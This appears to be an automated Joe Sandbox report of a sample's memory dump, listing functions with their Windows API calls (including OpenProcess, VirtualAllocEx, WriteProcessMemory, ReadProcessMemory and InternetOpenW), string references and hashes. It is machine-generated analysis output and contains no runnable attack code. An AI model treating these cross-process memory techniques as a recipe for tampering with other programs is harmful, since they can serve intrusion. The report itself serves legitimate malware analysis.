Function 007C7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 007C7B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007C7B76

Strings

', xrefs: 007C7ACA

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: e09cdbcf4590b673b30187fc38c51002b3df5eebab4b083f4785d5e65f894589
Instruction ID: 330a832adde58c7f817fdcf07f3bef58a7da222a3c484fb50ee72088f48d98d5
Opcode Fuzzy Hash: e09cdbcf4590b673b30187fc38c51002b3df5eebab4b083f4785d5e65f894589
Instruction Fuzzy Hash: B541E974A0520A9FDB54CF68C981FEEBBB5FB08300F14416EE904AB391DB75A951DF90

Function 007C6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 007C6B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007C6B53

Strings

static, xrefs: 007C6AB3

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 7dc07ae73349837c130a6324a537184a643644d8a13a76da186bfc642c6bcef1
Instruction ID: 21e8b71549e20ca77ae0acd1df79d5ae666cb78a22ba15d83e65c435b8be3ca4
Opcode Fuzzy Hash: 7dc07ae73349837c130a6324a537184a643644d8a13a76da186bfc642c6bcef1
Instruction Fuzzy Hash: 90316CB1200604AADB109F68CC85FBB77A9FF48760F10861DF9A5D7190DB39AC91DB60

Function 0079994C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00799965
SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0079999F

Strings

@U=u, xrefs: 00799965, 0079999F

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 44633ce09b495e2ad302b4584408a112914a6ce58e01a57c9d771a46b04b6d26
Instruction ID: 7c6cc9e5dd787ff790374b55ba18dfb50d5e679d389157b35a83ed1e4df37af1
Opcode Fuzzy Hash: 44633ce09b495e2ad302b4584408a112914a6ce58e01a57c9d771a46b04b6d26
Instruction Fuzzy Hash: B421D771D00205EFDF14EBA8D885DAEB779EF88710B01806DFA15A7291EB7D6C41C750

Function 007A28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007A294C

Strings

0, xrefs: 007A290A

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 12c0928203de4d25b34c1d85b2ca179bef8e5f9a3598782583bf5ee3b8933c3e
Instruction ID: 2002ab08854c4a671844b387f2c6d47a74e6ad543cd40b9e69aaf0f2fcccb409
Opcode Fuzzy Hash: 12c0928203de4d25b34c1d85b2ca179bef8e5f9a3598782583bf5ee3b8933c3e
Instruction Fuzzy Hash: F831F531600305EBEB24CF5CC845BAFBBB8EF86750F140229EDC1B61A2D778A942CB51

Function 0079A9B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0075603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00756051

SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0079AA10
_strlen.LIBCMT ref: 0079AA1B

Strings

@U=u, xrefs: 0079AA10

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$Timeout_strlen
String ID: @U=u
API String ID: 2777139624-2594219639
Opcode ID: a6e826e5f51cfa1e15f1ed30371b6ef20ffc84af5ce6e1aa8c2524d8236e95c7
Instruction ID: 629eb7224ec9deefe08cf3177a4a33fa4fb85e19f20095504417fce15b04b599
Opcode Fuzzy Hash: a6e826e5f51cfa1e15f1ed30371b6ef20ffc84af5ce6e1aa8c2524d8236e95c7
Instruction Fuzzy Hash: F311D532305105BBCF18BE78EDCA9BE7BA9DF45700F10902DF9069B193DE2D9949C691

Function 007C6865 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007A55FD: GetLocalTime.KERNEL32 ref: 007A560A
Part of subcall function 007A55FD: _wcsncpy.LIBCMT ref: 007A563F
Part of subcall function 007A55FD: _wcsncpy.LIBCMT ref: 007A5671
Part of subcall function 007A55FD: _wcsncpy.LIBCMT ref: 007A56A4
Part of subcall function 007A55FD: _wcsncpy.LIBCMT ref: 007A56E6

SendMessageW.USER32(?,00001002,00000000,?), ref: 007C68FF

Strings

SysDateTimePick32, xrefs: 007C68BD
@U=u, xrefs: 007C68FF

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _wcsncpy$LocalMessageSendTime
String ID: @U=u$SysDateTimePick32
API String ID: 2466184910-2530228043
Opcode ID: 3026691df2b7283e498744e72c0227ab20d6d8ed6858332f64e82808c67fb344
Instruction ID: 65e03160c7872b555b077376e0678b332b85050cd95a8ed140af2d158f69b6c1
Opcode Fuzzy Hash: 3026691df2b7283e498744e72c0227ab20d6d8ed6858332f64e82808c67fb344
Instruction Fuzzy Hash: 5B210671740209AFEF219E14DC82FEA73AAEB44750F20451DF950AB1D0D6B9EC908B60

Function 00799225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0079923E

Part of subcall function 007A13DE: GetWindowThreadProcessId.USER32(?,?), ref: 007A1409
Part of subcall function 007A13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0079925A,00000034,?,?,00001004,00000000,00000000), ref: 007A1419
Part of subcall function 007A13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0079925A,00000034,?,?,00001004,00000000,00000000), ref: 007A142F

Part of subcall function 007A14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00799296,?,?,00000034,00000800,?,00000034), ref: 007A14E6

SendMessageW.USER32(?,00001073,00000000,?), ref: 007992A5

Part of subcall function 007A1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007992C5,?,?,00000800,?,00001073,00000000,?,?), ref: 007A14B1

Strings

@U=u, xrefs: 0079923E, 007992A5

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
String ID: @U=u
API String ID: 1045663743-2594219639
Opcode ID: b87ff9710e43a7b524533c71e3df12415e7814a5de62e8f02f3b7dc8ebdec8b9
Instruction ID: 3958ee029a8bd76e071d52c86eb08c513a2b55ea6d25555f6d3194b00b0b0c31
Opcode Fuzzy Hash: b87ff9710e43a7b524533c71e3df12415e7814a5de62e8f02f3b7dc8ebdec8b9
Instruction Fuzzy Hash: 7D217131902118EBEF11DFA8DC85FDDBBB8FF09350F1001A9FA49A7191DA745A44CB90

Function 007C66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007C6761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C676C

Strings

Combobox, xrefs: 007C672E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 6badf2ccce8bcaab0672f80ef393f4f48e1992ab033fa46bea2ceb2b286ed811
Instruction ID: 1593dc86def2a0f48e1254e5e11787d1a915f2c0701c19ac385bfaa6205b4537
Opcode Fuzzy Hash: 6badf2ccce8bcaab0672f80ef393f4f48e1992ab033fa46bea2ceb2b286ed811
Instruction Fuzzy Hash: 681182B5300208AFEF119F54DCC5FBB376AEB48368F10452DF918A7290D679DC519BA0

Function 007C96F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

@U=u, xrefs: 007C9778, 007C97A1

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID: @U=u
API String ID: 0-2594219639
Opcode ID: 87d4105a2b22e32d82686454e75c6cffbe0b0ee29aec78c16ff9855f783dbfec
Instruction ID: bc0a41f781dd51b657b8e066e7161818dceaf0f0ac27c0e2ac89c93e430cc68c
Opcode Fuzzy Hash: 87d4105a2b22e32d82686454e75c6cffbe0b0ee29aec78c16ff9855f783dbfec
Instruction Fuzzy Hash: DF217F35125108FFEB508F68CC49FBA37A4EB09310F40416DFB16EA1E0DA7AE910DB60

Function 007C6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00741D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00741D73
Part of subcall function 00741D35: GetStockObject.GDI32(00000011), ref: 00741D87
Part of subcall function 00741D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00741D91

GetWindowRect.USER32(00000000,?), ref: 007C6C71
GetSysColor.USER32(00000012), ref: 007C6C8B

Strings

static, xrefs: 007C6C4E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 942c2eda0e13940182cb0a474483600f623ba702078513718f821a1e8a9df22f
Instruction ID: 090b541d20c063ad4aebb33997c49b1c16399cfbe6b2aaee4c9b0059be79365d
Opcode Fuzzy Hash: 942c2eda0e13940182cb0a474483600f623ba702078513718f821a1e8a9df22f
Instruction Fuzzy Hash: FE21F972610209AFDF14DFA8DC85EFA7BA9FB08314F00462DF995D2251D739E861DB60

Function 007A29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007A2A41

Strings

0, xrefs: 007A2A18

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 583bd65120171380ee9e3d8c15c2349c1f07933681650a6d80cfe5c037626c14
Instruction ID: e426c5fc4ac5932814e08bd76d3c14cefa73b36b51867ea8b07fc7429b399a77
Opcode Fuzzy Hash: 583bd65120171380ee9e3d8c15c2349c1f07933681650a6d80cfe5c037626c14
Instruction Fuzzy Hash: CA119332A05114ABDF34DA9CDC44B9B77B8ABC6310F148221ED55E7292D778AD0BCB91

Function 007B21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007B222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007B2255

Strings

<local>, xrefs: 007B221D

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 6a5ef6e7512050b5f9e2fcffa095e4167a3682504ead10c5378c17031b08cf38
Instruction ID: 9c83c323c5bc9ac367e097518c7c14656fdc0256c338ec13521ebfc70531b9e6
Opcode Fuzzy Hash: 6a5ef6e7512050b5f9e2fcffa095e4167a3682504ead10c5378c17031b08cf38
Instruction Fuzzy Hash: 3D110270602229BADB248F118C84FFBFBA8FF06351F10822AFA0496001D3785892D6F0

Function 007C84E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 007C8530

Strings

@U=u, xrefs: 007C8530, 007C856C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: a155b5fc0134f225c812fcbddd215c4e22a47f9e3a445f35123699c61f2d542c
Instruction ID: d7978f2ce61a4cd7ede5b19289912655c046203fe223701941dfb658b115c80f
Opcode Fuzzy Hash: a155b5fc0134f225c812fcbddd215c4e22a47f9e3a445f35123699c61f2d542c
Instruction Fuzzy Hash: 8A21D379A00209EFCB45CF98E840DEA7BB6FB4C350B004158FD06A7360DB35AD61DBA1

Function 007C65B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,?,00000000), ref: 007C662C

Strings

@U=u, xrefs: 007C662C
button, xrefs: 007C6603

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$button
API String ID: 3850602802-1762282863
Opcode ID: a7ef97a520f864715656fe871c52c94365410b5181eef2900342244f69680f4e
Instruction ID: 4656c14ef92c8fc1b0d6e4272d91acba51ab3ee57cffb248b1106321cc424200
Opcode Fuzzy Hash: a7ef97a520f864715656fe871c52c94365410b5181eef2900342244f69680f4e
Instruction Fuzzy Hash: 6411C072250209ABDF119F60DC91FFA376AFF18314F15461CFA51A7190C77AECA2AB60

Function 007C788C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000133E,00000000,?), ref: 007C78D8

Strings

@U=u, xrefs: 007C78D8

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: c90749deba4f231eabede4252e9d150d209a1df25e9844085a9f2168fa78095d
Instruction ID: 8faeaadc45a32980ea9d644af85109230eb8ea5b63a33cdbcb9b929ebd95686b
Opcode Fuzzy Hash: c90749deba4f231eabede4252e9d150d209a1df25e9844085a9f2168fa78095d
Instruction Fuzzy Hash: F011A930504744AFDB24CF34C892BE7BBE9BF0A310F10891DE9AA97291DB757945DBA0

Function 007994A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007A14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00799296,?,?,00000034,00000800,?,00000034), ref: 007A14E6

SendMessageW.USER32(?,0000102B,?,00000000), ref: 00799509
SendMessageW.USER32(?,0000102B,?,00000000), ref: 0079952E

Strings

@U=u, xrefs: 00799509, 0079952E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$MemoryProcessWrite
String ID: @U=u
API String ID: 1195347164-2594219639
Opcode ID: d784d2549df6b21a69107c3c925adde5e925c1f5a4736e3263c4cbded8f59e74
Instruction ID: 5b805ccff002ff55922ccd4fb014ed25a0afdda680a4441a88d4bbb82ad4ba80
Opcode Fuzzy Hash: d784d2549df6b21a69107c3c925adde5e925c1f5a4736e3263c4cbded8f59e74
Instruction Fuzzy Hash: 48012B32900118EBEF11AF68EC4AEEEBB78DB04310F00416EF915A71D1DB746D54CB60

Function 007995D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000406,00000000,00000000), ref: 007995FB
SendMessageW.USER32(?,0000040D,?,00000000), ref: 0079962E

